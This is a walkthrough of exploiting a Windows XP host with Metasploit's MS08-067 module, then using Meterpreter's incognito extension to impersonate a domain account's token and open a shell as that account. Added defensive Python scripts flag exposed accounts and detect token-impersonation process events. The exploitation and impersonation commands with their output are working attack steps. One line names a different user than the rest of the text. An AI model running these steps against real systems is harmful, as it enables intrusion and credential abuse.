Now we will see how to impersonate a system user without having to create a new user with administrator permissions.
First, let's suppose that we have already got into the PC with an exploit such as:
- exploit/windows/smb/ms08_067_netapi
and with a PAYLOAD such as:
- windows/vncinject/bind_tcp
In this case we will use the PAYLOAD windows/meterpreter/bind_tcp, because the incognito extension runs inside a Meterpreter session. I will not explain much because many already know it.
Code:
msfconsole
       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 16 days ago (2009.12.10)
Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >
After obtaining the Meterpreter session, we load the incognito extension with the use command:
Code:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
Let's look at the commands the extension provides:
Code:
meterpreter > help
Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

meterpreter >
We will use the list_tokens command, but first let's see what parameters it takes:
Code:
meterpreter > list_tokens
Usage: list_tokens <list_order_option>

Lists all accessible tokens and their privilege level

OPTIONS:

    -g        List tokens by unique groupname
    -u        List tokens by unique username

meterpreter >
Now we list the users whose tokens are present on the system:
Code:
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
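The two sections of the list_tokens -u output above matter differently: a delegation token can be used to authenticate to other machines as that account, while an impersonation token is only usable on the local host. For an incident responder that means every non-built-in account with a delegation token on a compromised host has to be treated as compromised itself. The following Python script is an added example, not code from the original post or from Metasploit: it parses the output format shown above and reports those accounts. The sample text is a constructed copy of the output above, and the list of built-in principals (English names plus the Spanish ones that appear in the output) is the example's own.

```python
from typing import Dict, List

# Constructed sample, copied from the list_tokens -u output in the post.
SAMPLE_LIST_TOKENS = """\
Delegation Tokens Available
========================================
COLTEJER\\ServerColtejer
NT AUTHORITY\\Servicio de red
NT AUTHORITY\\SERVICIO LOCAL
NT AUTHORITY\\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\\ANONYMOUS LOGON
"""

# Built-in Windows service identities (English and the Spanish names seen
# above). They are not user or domain accounts, so there is no password to
# rotate for them. Constructed list for this example; extend per locale.
BUILTIN_PRINCIPALS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\SERVICIO LOCAL",
    "NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\SERVICIO DE RED",
    "NT AUTHORITY\\ANONYMOUS LOGON",
}


def parse_list_tokens(text: str) -> Dict[str, List[str]]:
    """Split list_tokens -u output into its delegation and impersonation sections."""
    sections: Dict[str, List[str]] = {"delegation": [], "impersonation": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        # skip blank lines and the ===== underline below each heading
        if not line or set(line) == {"="}:
            continue
        low = line.lower()
        if low.startswith("delegation tokens"):
            current = "delegation"
        elif low.startswith("impersonation tokens"):
            current = "impersonation"
        elif low.startswith("no tokens available"):
            continue  # incognito prints this for an empty section
        elif current is not None:
            sections[current].append(line)
    return sections


def exposed_accounts(text: str) -> List[str]:
    """Accounts whose delegation token lives on this host.

    Once the host is compromised these accounts can be used against other
    machines, so they need a credential reset and a review of where else
    they have logged on."""
    tokens = parse_list_tokens(text)
    return sorted(t for t in tokens["delegation"]
                  if t.upper() not in BUILTIN_PRINCIPALS)


if __name__ == "__main__":
    parsed = parse_list_tokens(SAMPLE_LIST_TOKENS)
    print("delegation tokens:   ", parsed["delegation"])
    print("impersonation tokens:", parsed["impersonation"])
    print("accounts to reset:   ", exposed_accounts(SAMPLE_LIST_TOKENS))
```

The built-in principals are compared case-insensitively because incognito prints them as Windows names them for the installed language, as the mixed-case Spanish entries above show.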
Now comes the moment when we impersonate a user.
Code:
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >
Finally, open a console (remote shell) as the impersonated user; in this case the user ayman\Serverayman:
Code:
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
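The last step is what leaves a trace on the host: a process owned by NT AUTHORITY\SYSTEM (the exploited service) creates cmd.exe running under a different account's token. On Windows 10 / Server 2016 and later, Security event 4688 records both the creating account (Subject) and the account the new process runs as (Target Subject), which is exactly the mismatch to look for; the Windows XP host in the post only logs the creating account, so there an EDR that records each process's own account is needed. The following Python script is an added example, not code from the original post or from Metasploit: it runs that check over a constructed list of process-creation events. The field names, the allowlist of parents that legitimately start processes as another account, and the sample events are all the example's own, modelled on the 4688 Subject / Target Subject pairs.

```python
from typing import Dict, List, Optional

# Constructed process-creation events, modelled on the Subject / Target
# Subject pairs of Security event 4688. Field names are this example's own.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # benign: the service control manager starting a service as NETWORK SERVICE
    {"pid": "812", "new_process": r"C:\Windows\System32\svchost.exe",
     "parent_process": r"C:\Windows\System32\services.exe",
     "subject_user": r"NT AUTHORITY\SYSTEM",
     "target_user": r"NT AUTHORITY\NETWORK SERVICE"},
    # benign: a user's own program under the user's own account
    {"pid": "2104", "new_process": r"C:\Windows\System32\notepad.exe",
     "parent_process": r"C:\Windows\explorer.exe",
     "subject_user": r"COLTEJER\alice", "target_user": r"COLTEJER\alice"},
    # the scenario in the post: a SYSTEM-owned service process creates cmd.exe
    # under another account's token (process 1528, as in the execute output)
    {"pid": "1528", "new_process": r"C:\Windows\System32\cmd.exe",
     "parent_process": r"C:\Windows\System32\svchost.exe",
     "subject_user": r"NT AUTHORITY\SYSTEM",
     "target_user": r"COLTEJER\ServerColtejer"},
    # a non-system parent creating a process under a foreign token
    {"pid": "3320", "new_process": r"C:\Windows\System32\rundll32.exe",
     "parent_process": r"C:\Users\Public\updater.exe",
     "subject_user": r"NT AUTHORITY\SYSTEM",
     "target_user": r"COLTEJER\ServerColtejer"},
]

# Parents that routinely create processes under a different account
# (service start, interactive logon, scheduled tasks). Constructed
# allowlist for the example; tune it per environment.
TRUSTED_SPAWNERS = {"services.exe", "wininit.exe", "winlogon.exe",
                    "userinit.exe", "taskeng.exe", "svchost.exe"}
# Interactive shells are flagged whenever they run under a token that does
# not match their creator, even if the parent is otherwise trusted.
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return why the event looks like a process created under a foreign
    token, or None when it looks benign."""
    if event["subject_user"].lower() == event["target_user"].lower():
        return None  # same account on both sides: nothing to see
    if basename(event["new_process"]) in SHELLS:
        return "interactive shell running as a different account than its creator"
    if basename(event["parent_process"]) not in TRUSTED_SPAWNERS:
        return "account change from a parent that normally never does this"
    return None


def find_token_impersonation(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the check over a batch of events and collect the findings."""
    findings = []
    for ev in events:
        reason = classify(ev)
        if reason is not None:
            findings.append({"pid": ev["pid"],
                             "new_process": ev["new_process"],
                             "creator": ev["subject_user"],
                             "runs_as": ev["target_user"],
                             "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in find_token_impersonation(SAMPLE_EVENTS):
        print(f"pid {finding['pid']}: {finding['new_process']} created by "
              f"{finding['creator']} but running as {finding['runs_as']} "
              f"({finding['reason']})")
```

The allowlist keeps the normal service and logon machinery quiet, which is why the first rule fires on shells regardless of parent: the post's cmd.exe is created by a service host that would otherwise pass as trusted. Process 1528 and the unusual-parent case are the two findings the sample produces.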